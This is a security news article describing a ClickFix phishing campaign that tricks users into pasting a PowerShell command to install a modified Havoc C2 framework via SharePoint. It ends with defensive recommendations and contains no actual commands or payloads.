ClickFix Phishing Campaign Deploys Havoc Malware Through Microsoft SharePoint

Cybersecurity researchers have discovered a sophisticated phishing campaign targeting Microsoft SharePoint accounts, using a deceptive technique called ClickFix. This attack exploits user trust to execute malicious commands, deploying the powerful Havoc command-and-control (C2) framework to seize full control over compromised systems.

The ClickFix cyberattack technique involves tricking users into executing malicious PowerShell commands by presenting them with a fake error message delivered via phishing email. The user is instructed to copy and paste the command, which then downloads and runs malware, allowing hackers to steal data and maintain control over the system.

The Havoc Framework is an open-source post-exploitation command and control (C2) framework designed for cybersecurity professionals and researchers. It lets users manage compromised systems and execute various post-exploitation tasks. Havoc supports features like payload generation, HTTP/HTTPS listeners, and various built-in post exploitation commands.

How does the phishing campaign exploit Havoc C2 to take over systems?

The ClickFix campaign was first discovered by researchers from FortiGuard Labs. The attackers leverage the Microsoft Graph API within SharePoint to hide their malicious command and control (C2) communications. They send phishing emails that instruct the recipient to review a restricted notice that requires them to click on an attached HTML document (Documents.html).

Once clicked, the HTML document shows a fake error message that asks users to update the DNS cache manually. Users click on the “How to fix” button to automatically copy a PowerShell command to the Windows clipboard and paste it into their systems. This command is designed to launch another PowerShell script hosted on the SharePoint server to execute the malicious Havoc code.

This final malicious payload is a customized version of the Havoc framework. The threat actors use the Microsoft Graph API within SharePoint to disguise their command and control communications. This modified Havoc framework, the attackers can gain complete control over the compromised system.

How to protect your organization against sophisticated phishing attacks?

Fortiguard Labs advises that users should be extremely cautious dealing with messages that prompt them to open a terminal or PowerShell. These messages can be part of social engineering attacks designed to trick users into running malicious commands. It should help users to avoid unintentionally downloading and executing harmful code.

It’s also recommended that security teams should use AI-powered API security platforms to boost their security measures. These platforms can analyze API traffic in real-time, identify unusual patterns or anomalies, and proactively block malicious activities. Organizations can also implement strong API posture governance that involves several key practices to minimize the risk of similar attacks. This includes strict authentication and authorization, enforcing least privilege access, and continuously monitoring API activity.